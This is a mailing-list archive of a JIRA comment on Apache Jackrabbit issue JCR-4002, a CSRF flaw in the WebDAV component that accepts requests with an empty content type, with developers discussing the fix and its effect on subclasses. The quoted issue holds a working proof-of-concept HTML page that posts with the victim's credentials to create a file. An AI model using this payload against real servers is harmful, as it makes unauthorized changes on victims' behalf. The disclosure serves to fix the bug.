jackrabbit-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Julian Reschke (JIRA)" <j...@apache.org>
Subject [jira] [Comment Edited] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
Date Mon, 29 Aug 2016 12:27:20 GMT

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812
] 

Julian Reschke edited comment on JCR-4002 at 8/29/16 12:27 PM:
---------------------------------------------------------------

But that means that code extending from this now will have to the CSRF protection, right?
If this is true, we need (a) to document that and (b) to review the existing code that *does*
extend it (JSOP?), (c) figure out whether code written by third-parties might be affected
as well.


was (Author: reschke):
But that means that code extending from this now will have to the CSRF protection, right?
If this is true, we need (a) to document that and (b) to review the existing code that *does*
extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type.
This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of
rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Mime
View raw message